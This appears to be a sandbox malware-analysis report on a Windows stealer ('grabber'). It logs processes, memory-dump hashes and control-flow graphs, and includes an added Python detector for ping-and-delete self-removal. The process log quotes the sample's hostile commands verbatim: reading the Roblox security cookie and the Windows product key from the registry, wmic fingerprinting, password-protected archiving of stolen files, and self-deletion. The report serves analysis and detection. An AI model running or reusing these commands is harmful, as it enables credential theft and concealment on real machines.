                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:105
                                                                                                                                                                                                                              Start time:01:19:43
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:106
                                                                                                                                                                                                                              Start time:01:19:44
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                              Imagebase:0x340000
                                                                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:107
                                                                                                                                                                                                                              Start time:01:19:46
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" *"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:108
                                                                                                                                                                                                                              Start time:01:19:46
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:109
                                                                                                                                                                                                                              Start time:01:19:46
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" *
                                                                                                                                                                                                                              Imagebase:0x7ff6faa20000
                                                                                                                                                                                                                              File size:630'736 bytes
                                                                                                                                                                                                                              MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Antivirus matches:
• Detection: 0%, ReversingLabs
Has exited:true

Target ID:110
Start time:01:19:48
Start date:05/01/2025
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:111
Start time:01:19:48
Start date:05/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:112
Start time:01:19:49
Start date:05/01/2025
Path:C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):true
Commandline:wmic os get Caption
Imagebase:0xf90000
File size:427'008 bytes
MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:113
Start time:01:19:50
Start date:05/01/2025
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:114
Start time:01:19:50
Start date:05/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:115
Start time:01:19:50
Start date:05/01/2025
Path:C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):true
Commandline:wmic computersystem get totalphysicalmemory
Imagebase:0xf90000
File size:427'008 bytes
MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:116
Start time:01:19:52
Start date:05/01/2025
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:117
Start time:01:19:52
Start date:05/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:118
Start time:01:19:52
Start date:05/01/2025
Path:C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):true
Commandline:wmic csproduct get uuid
Imagebase:0x7ff6eef20000
File size:427'008 bytes
MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:119
Start time:01:19:53
Start date:05/01/2025
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:120
Start time:01:19:53
Start date:05/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:121
                                                                                                                                                                                                                              Start time:01:19:53
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                              Imagebase:0x340000
                                                                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:122
                                                                                                                                                                                                                              Start time:01:19:55
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:123
                                                                                                                                                                                                                              Start time:01:19:55
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:124
                                                                                                                                                                                                                              Start time:01:19:55
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                              Imagebase:0xf90000
                                                                                                                                                                                                                              File size:427'008 bytes
                                                                                                                                                                                                                              MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:125
                                                                                                                                                                                                                              Start time:01:19:56
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:126
                                                                                                                                                                                                                              Start time:01:19:56
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:127
                                                                                                                                                                                                                              Start time:01:19:56
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                                                              Imagebase:0x340000
                                                                                                                                                                                                                              File size:433'152 bytes
                                                                                                                                                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:128
                                                                                                                                                                                                                              Start time:01:19:59
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\KpHYfxnJs6.exe""
                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:129
                                                                                                                                                                                                                              Start time:01:19:59
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:130
                                                                                                                                                                                                                              Start time:01:19:59
                                                                                                                                                                                                                              Start date:05/01/2025
                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                              Commandline:ping localhost -n 3
                                                                                                                                                                                                                              Imagebase:0x6f0000
                                                                                                                                                                                                                              File size:18'944 bytes
                                                                                                                                                                                                                              MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true
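
The `ping localhost -n 3` process above is the delay step of the usual cmd.exe self-deletion idiom (sleep a few seconds so the parent can exit, then `del` the dropped binary). The detection below is an added example written for this page, not code from Joe Sandbox or from the sample: it parses a ping command line, estimates the sleep it produces, and flags loopback pings that sit in the same command line as a `del`, or whose parent command line deletes a file. The process records, pids, paths and field names are constructed for illustration and are not the report's schema.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcessEvent:
    """Constructed process-creation record; field names are an assumption."""
    pid: int
    ppid: int
    image: str
    cmdline: str


LOOPBACK = {"localhost", "127.0.0.1", "127.1", "::1"}
# 'ping' or a path ending in ping.exe at the start of a command, or after a
# quote / cmd.exe operator, followed by at least one space and its arguments
PING_START = re.compile(r'(?i)(?:^|[\s"&|(])(?:[\w:\\.]*[\\/])?ping(?:\.exe)?\s+')
CMD_OPERATOR = re.compile(r"\s*(?:&&|\|\||&|\|)\s*")
REDIRECT = re.compile(r"\s*\d?>>?\s*\S+")          # '> nul', '2>nul', '>> log'
DEL_CMD = re.compile(r"(?i)(?:^|[\s&|(])(?:del|erase)\s")
# ping.exe switches that consume the following token
SWITCH_WITH_ARG = {"-l", "-i", "-v", "-r", "-s", "-j", "-k", "-w", "-c", "-p"}


def parse_ping(cmdline: str) -> Optional[Tuple[Optional[str], int]]:
    """Return (target, echo_request_count) for the first ping in a command
    line, or None if the line does not invoke ping. Only the ping's own
    arguments are parsed: redirections are dropped and the line is cut at the
    first cmd.exe operator (&, &&, |, ||)."""
    m = PING_START.search(cmdline)
    if not m:
        return None
    args = CMD_OPERATOR.split(cmdline[m.end():], maxsplit=1)[0]
    tokens = REDIRECT.sub("", args).replace('"', "").split()
    count, target = 4, None      # ping.exe sends 4 echo requests unless -n is given
    i = 0
    while i < len(tokens):
        tok = tokens[i].lower()
        if tok.startswith("/"):  # cmd users often write /n for -n
            tok = "-" + tok[1:]
        if tok == "-n" and i + 1 < len(tokens) and tokens[i + 1].isdigit():
            count = int(tokens[i + 1])
            i += 2
        elif tok in SWITCH_WITH_ARG:
            i += 2
        elif tok.startswith("-"):
            i += 1
        else:
            target = tok
            i += 1
    return target, count


def delay_seconds(count: int) -> int:
    """ping.exe spaces echo requests one second apart and loopback answers at
    once, so N requests block the script for roughly N-1 seconds."""
    return max(count - 1, 0)


def find_self_delete(events: List[ProcessEvent]) -> List[Tuple[int, str, int]]:
    """Flag loopback pings used as a sleep, strongest when paired with del."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parsed = parse_ping(e.cmdline)
        if parsed is None or parsed[0] not in LOOPBACK:
            continue
        _, count = parsed
        parent = by_pid.get(e.ppid)
        if DEL_CMD.search(e.cmdline):
            kind = "ping_del_chain"             # sleep and delete in one cmd line
        elif parent is not None and DEL_CMD.search(parent.cmdline):
            kind = "ping_del_chain_via_parent"  # ping.exe child of a deleting cmd.exe
        else:
            kind = "loopback_ping_delay"        # sleep only; weak on its own
        findings.append((e.pid, kind, delay_seconds(count)))
    return findings


# Constructed sample events (pids, paths and the stager name are made up).
SAMPLE_EVENTS = [
    ProcessEvent(100, 1, r"C:\Windows\system32\cmd.exe",
                 r'C:\Windows\system32\cmd.exe /c ping localhost -n 3 > nul '
                 r'& del /f /q "C:\Users\user\AppData\Local\Temp\stager.exe"'),
    ProcessEvent(130, 100, r"C:\Windows\SysWOW64\PING.EXE", "ping localhost -n 3"),
    ProcessEvent(200, 1, r"C:\Windows\System32\PING.EXE", "ping 8.8.8.8 -n 4"),
    ProcessEvent(300, 1, r"C:\Windows\System32\PING.EXE", "ping -n 6 127.0.0.1 > nul"),
    ProcessEvent(400, 1, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -c Get-Process"),
]

if __name__ == "__main__":
    for pid, kind, secs in find_self_delete(SAMPLE_EVENTS):
        print(f"pid {pid}: {kind}, ~{secs}s sleep")
```

Loopback pings with `-n` also appear in benign installers and batch scripts that need a crude sleep, so the `loopback_ping_delay` result alone is a weak signal; the pairing with `del` in the same line or in the parent's command line, and a parent that is itself a short-lived cmd.exe spawned by a freshly dropped executable, is what makes it worth alerting on.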

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000003.2879676762.0000000007672000.00000004.00000020.00020000.00000000.sdmp, Offset: 07672000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_7672000_KpHYfxnJs6.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: a[QF
                                                                                                                                                                                                                                • API String ID: 0-4264035995
                                                                                                                                                                                                                                • Opcode ID: 75bd98a36188ad60de02ce91e29ded9cbb8a897b0a3597360a4493265b2987e3
                                                                                                                                                                                                                                • Instruction ID: e94bc172a16018dec85f3ef3a8a13e53a05d3f071712b1c8f388730aae4560a4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75bd98a36188ad60de02ce91e29ded9cbb8a897b0a3597360a4493265b2987e3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6351333240A2D29FC702CF79D982496BF61FE5331472845DDD4C24F526C360AA2ACB9A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000003.2879676762.0000000007672000.00000004.00000020.00020000.00000000.sdmp, Offset: 07672000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_7672000_KpHYfxnJs6.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a38329ffaca6f46b50fb0d6fdc77241eb7021379a59e3d4c20b67fc23c1338c2
                                                                                                                                                                                                                                • Instruction ID: 759c103369d7cfa834bbe92bcc11580713721db1a42476a1d886747c96ac4210
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a38329ffaca6f46b50fb0d6fdc77241eb7021379a59e3d4c20b67fc23c1338c2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B851ECF140E7D18FC313CF38D9A5AA6BFA5AE4721531E45CCD4C28F223D2696605CB26
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000003.2879676762.0000000007672000.00000004.00000020.00020000.00000000.sdmp, Offset: 07679000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_7672000_KpHYfxnJs6.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a38329ffaca6f46b50fb0d6fdc77241eb7021379a59e3d4c20b67fc23c1338c2
                                                                                                                                                                                                                                • Instruction ID: 759c103369d7cfa834bbe92bcc11580713721db1a42476a1d886747c96ac4210
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a38329ffaca6f46b50fb0d6fdc77241eb7021379a59e3d4c20b67fc23c1338c2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B851ECF140E7D18FC313CF38D9A5AA6BFA5AE4721531E45CCD4C28F223D2696605CB26
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000003.2879676762.0000000007672000.00000004.00000020.00020000.00000000.sdmp, Offset: 07672000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_7672000_KpHYfxnJs6.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: ee1ef64790ae6055115f39cb9d5af3942d76d7a9f41f9193108f7f31350ea5da
                                                                                                                                                                                                                                • Instruction ID: e2978849986332ea1c0e24228df283aefd34652e3d08e523bbdff4d4adbf5781
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee1ef64790ae6055115f39cb9d5af3942d76d7a9f41f9193108f7f31350ea5da
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D2122721092D18FD306CF34D494A927FA2FF8B31639A40DCD9C18F527C2B5A942CB52

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:5.5%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                Total number of Nodes:3
                                                                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                                                                execution_graph 22038 8eb63a0 22039 8eb63e3 SetThreadToken 22038->22039 22040 8eb6411 22039->22040

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 1031 4e2b551-4e2b579 1032 4e2b57b 1031->1032 1033 4e2b57e-4e2b8b9 call 4e2aa64 1031->1033 1032->1033 1094 4e2b8be-4e2b8c5 1033->1094
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 37c6e7ceece4e0ce0bab77ca3b4e92aea4cfe7cf386f0a9138f39ac93789d177
                                                                                                                                                                                                                                • Instruction ID: 93ec5c566deaa05d14fe00603a3702c59a2eca93ddea488b2887ca39405b5b04
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 37c6e7ceece4e0ce0bab77ca3b4e92aea4cfe7cf386f0a9138f39ac93789d177
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59918471B007245FDB19EFB4C5155AEB7F2EF84608B00891DD44AAB344DF74690ACBE6

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 1095 4e2b560-4e2b579 1096 4e2b57b 1095->1096 1097 4e2b57e-4e2b8b9 call 4e2aa64 1095->1097 1096->1097 1158 4e2b8be-4e2b8c5 1097->1158
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2537617959.0000000004E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E20000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_4e20000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 2a53e64190365676c4837b0696d223af070fe87c4e005693fa96c3755362a5cb
                                                                                                                                                                                                                                • Instruction ID: 3446c0d369f70d44754a2c17f8fae256d1eadb392f5655ce3256ed2fb0cf3c9a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a53e64190365676c4837b0696d223af070fe87c4e005693fa96c3755362a5cb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 93917471B006285BEB19EFB4C5155AEB7E2EF84608B00891DD50AAB344DF746D06CBE6
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000E.00000002.2555958866.0000000007D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D40000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7d40000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 4'^q$4'^q$JEj$JEj$JEj$JEj$JEj$JEj$rDj$rDj
                                                                                                                                                                                                                                • API String ID: 0-3284929975
                                                                                                                                                                                                                                • Opcode ID: ffeb7e5a5944ec5a0d9838bd115bd894f467301b66959ca63d61b91d2e28c1b0
                                                                                                                                                                                                                                • Instruction ID: 97706f321e5ac6f756e597a9cd88fad281cecaeead2fe2bf20b8a0c1b268ee75
